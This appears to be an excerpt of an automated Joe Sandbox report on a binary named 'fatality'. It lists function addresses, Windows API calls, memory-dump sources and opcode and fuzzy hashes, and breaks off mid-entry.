                                                                    • Instruction ID: 33ab65b1335b7862d3d19d2b6d6be7d317977da0d7f8d708e28573a9ef1811f7
                                                                    • Opcode Fuzzy Hash: 1073ee188ca76be23d2e561b6bf71bf7c7c4cdf2338071565a26c5c2c72e0ad5
                                                                    • Instruction Fuzzy Hash: 3DA01130202200AB8A000F338F0AA8EBAAAAFA2B20F00C028A00080030CB30C820AA00
                                                                    Function 00DE9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00DE95D6,00000000,00E12641,000000FF), ref: 00DE963B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: bfd729ddbf538dfd1d63a1f4ccdca594f69fab40709b1ab057613fca8ee58ea8
                                                                    • Instruction ID: 65e32d3b81c1915977e444fb5dab4f49035255b4c89383d48aca746a7771c699
                                                                    • Opcode Fuzzy Hash: bfd729ddbf538dfd1d63a1f4ccdca594f69fab40709b1ab057613fca8ee58ea8
                                                                    • Instruction Fuzzy Hash: 2EF080704827555FD7305B35C458792F7E87B12321F085B1FD0E6425E1D771558D8660
                                                                    Function 00DFAC7C Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoUninitialize.COMBASE(?,?,?,?,00E12641,000000FF), ref: 00DFACB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Uninitialize
                                                                    • String ID:
                                                                    • API String ID: 3861434553-0
                                                                    • Opcode ID: e723ee89861195ae52f9d5477e4fc4ccf0cf84ed3d72d0844c7e6e3b7569be3f
                                                                    • Instruction ID: ff45f7b02a4b9f55a29ed16d478fb0964d7f7ce8b10c0776d4c4d980e6abf4d9
                                                                    • Opcode Fuzzy Hash: e723ee89861195ae52f9d5477e4fc4ccf0cf84ed3d72d0844c7e6e3b7569be3f
                                                                    • Instruction Fuzzy Hash: DAE06572604650EFC710AF59DC06B45FBA8FB88B20F104269F416E37B0CB746841CA90
                                                                    Function 00FC8598 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00FC85C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E5B000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 656fb080322a01f7b9c87320640fd0178527a2eb97592735762a2af62f0941c0
                                                                    • Instruction ID: 0cb320968c86115cb120b62d95e3dbbe7ac235bf03631ea2f161dcb791864ba6
                                                                    • Opcode Fuzzy Hash: 656fb080322a01f7b9c87320640fd0178527a2eb97592735762a2af62f0941c0
                                                                    • Instruction Fuzzy Hash: ABE0ECB670010DABDB10CE4CDA85FAA33DDA798760F148415F609D7240C674EC11A765
                                                                    Function 00FC8598 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00FC85C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 656fb080322a01f7b9c87320640fd0178527a2eb97592735762a2af62f0941c0
                                                                    • Instruction ID: 0cb320968c86115cb120b62d95e3dbbe7ac235bf03631ea2f161dcb791864ba6
                                                                    • Opcode Fuzzy Hash: 656fb080322a01f7b9c87320640fd0178527a2eb97592735762a2af62f0941c0
                                                                    • Instruction Fuzzy Hash: ABE0ECB670010DABDB10CE4CDA85FAA33DDA798760F148415F609D7240C674EC11A765

                                                                    Non-executed Functions

                                                                    Function 00E0D8F0 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1380COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 16845f2765d913e6d6b10ac949a95960ad886d91301aeb207ec133afdf4b0135
                                                                    • Instruction ID: c19b6f31ca59191b1779a96832bf42c957ea6ed0e5931414ab7b73bd82f3506e
                                                                    • Opcode Fuzzy Hash: 16845f2765d913e6d6b10ac949a95960ad886d91301aeb207ec133afdf4b0135
                                                                    • Instruction Fuzzy Hash: 72C22772E086288FDB25CE689D407EAB7B5EB84304F1555EAD84DF7280E775AEC18F40
                                                                    Function 00DE32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog_swprintf
                                                                    • String ID: CMT$h%u$hc%u
                                                                    • API String ID: 146138363-3282847064
                                                                    • Opcode ID: cee769bf27b0aac634c9e030e48bc1873173704545bbfa8352f36242d836cc8f
                                                                    • Instruction ID: 4e4a4131ecd51fde9e4e5080e7a8e6083e811b841c88b1be13fd755ca1f57b48
                                                                    • Opcode Fuzzy Hash: cee769bf27b0aac634c9e030e48bc1873173704545bbfa8352f36242d836cc8f
                                                                    • Instruction Fuzzy Hash: 153291715142C4ABDB14EF75C899AF93BA5EF15300F08457DFD8A8B282DB749A49CB30
                                                                    Function 00DE286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE2874
                                                                    • _strlen.LIBCMT ref: 00DE2E3F
                                                                      • Part of subcall function 00DF02BA: __EH_prolog.LIBCMT ref: 00DF02BF
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE2F91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog$Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                    • String ID: CMT
                                                                    • API String ID: 1057911484-2756464174
                                                                    • Opcode ID: 2b03daf9effd2337e209c700e89d7d0cef98f1af2f52b9632b1de74bca58b1a9
                                                                    • Instruction ID: c8bc6c4644bbec0ff70a083ba916985b56da5c79199ffded88e6d587eb890252
                                                                    • Opcode Fuzzy Hash: 2b03daf9effd2337e209c700e89d7d0cef98f1af2f52b9632b1de74bca58b1a9
                                                                    • Instruction Fuzzy Hash: F062E5715002C58FDB19EF39C886AFA3BA5EF54300F08457EED9A8B282DB759945CB70
                                                                    Function 00E0D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ca42b9ec9b7586f9c51c3a7794b889afe196130f89528a14186d20df2addb04f
                                                                    • Instruction ID: bf18a6f392f1b78c5f902873918ec4d99e1a294345ce27fd26c8064502d679a7
                                                                    • Opcode Fuzzy Hash: ca42b9ec9b7586f9c51c3a7794b889afe196130f89528a14186d20df2addb04f
                                                                    • Instruction Fuzzy Hash: D1021C71E042199BDF18CFA9DC806ADF7F1EF88314F25916AD919F7384D731A9418B90
                                                                    Function 00DE40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gj
                                                                    • API String ID: 0-4203073231
                                                                    • Opcode ID: 27b7751e430c23b72ce657a6dbd8dca630702a874a4bcf78e46584d5b0e5b40e
                                                                    • Instruction ID: 10cbe9de03b84a5d480f46f215e78add758d6bcc856b14ba16c27566f5a9b341
                                                                    • Opcode Fuzzy Hash: 27b7751e430c23b72ce657a6dbd8dca630702a874a4bcf78e46584d5b0e5b40e
                                                                    • Instruction Fuzzy Hash: 5FC14872A183418FC354CF29D88065AFBE2BFC8308F59892EE998D7311D734E945CB96
                                                                    Function 0525456D Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: b=q=
                                                                    • API String ID: 0-4069823217
                                                                    • Opcode ID: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                                                    • Instruction ID: 82cd4cb51cb98265152c2b322181ba8d138886b9f3fe35800df9cd71db65d83d
                                                                    • Opcode Fuzzy Hash: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                                                    • Instruction Fuzzy Hash: D2314631559397AFCB328E3884A13C7BFE2AF562013E65AAFC4C48B406D72154C7DB86
                                                                    Function 00DF62CA Relevance: .8, Instructions: 829COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65c97f2002aada7871dd217f58149a810aa8f2f5665f5defa00c375d1f9d6c32
                                                                    • Instruction ID: 288d6bb1cd393a8da89a677d7b260b3f338001a5623474e109417b06ca9a4687
                                                                    • Opcode Fuzzy Hash: 65c97f2002aada7871dd217f58149a810aa8f2f5665f5defa00c375d1f9d6c32
                                                                    • Instruction Fuzzy Hash: 5962F7716047889FCB25CF38C4906B9BBE1AF95304F09C96DE9EA8B746D730E945CB21
                                                                    Function 00DF77EF Relevance: .8, Instructions: 817COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 769efa0c42816c00807ca40c49ef6cd4ce15f8447bc3c105b5c28df9457f4b61
                                                                    • Instruction ID: b5c2b3a818d7393cae4c6dc2af02d773df84de09aa14dc65c1d060026b1ea6b1
                                                                    • Opcode Fuzzy Hash: 769efa0c42816c00807ca40c49ef6cd4ce15f8447bc3c105b5c28df9457f4b61
                                                                    • Instruction Fuzzy Hash: FC62C8716083898FCB15CF2CC8909B9BBE1BF95304F19C96DE99A8B346D730E945CB25
                                                                    Function 00DEF461 Relevance: .7, Instructions: 694COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d3d0d950fd7afa08d42f26ba2b9a0a54462d0b528b3535cfd4003d3773fe981
                                                                    • Instruction ID: 362b6cee11cc8c558b0532ed570eefa3dcce8730565079bdfbb084b955b94128
                                                                    • Opcode Fuzzy Hash: 1d3d0d950fd7afa08d42f26ba2b9a0a54462d0b528b3535cfd4003d3773fe981
                                                                    • Instruction Fuzzy Hash: 43525A72A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                    Function 00DF7153 Relevance: .5, Instructions: 536COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
